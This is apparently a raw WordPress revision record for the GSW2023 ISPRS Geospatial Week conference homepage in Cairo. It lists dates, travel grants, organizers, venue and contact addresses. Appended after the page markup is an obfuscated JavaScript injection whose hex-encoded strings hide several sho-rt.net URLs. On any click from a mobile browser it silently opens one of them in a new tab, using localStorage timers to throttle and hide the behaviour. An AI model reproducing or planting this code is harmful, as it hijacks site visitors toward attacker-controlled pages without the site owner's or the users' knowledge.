white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-03 11:30:48','2023-06-03 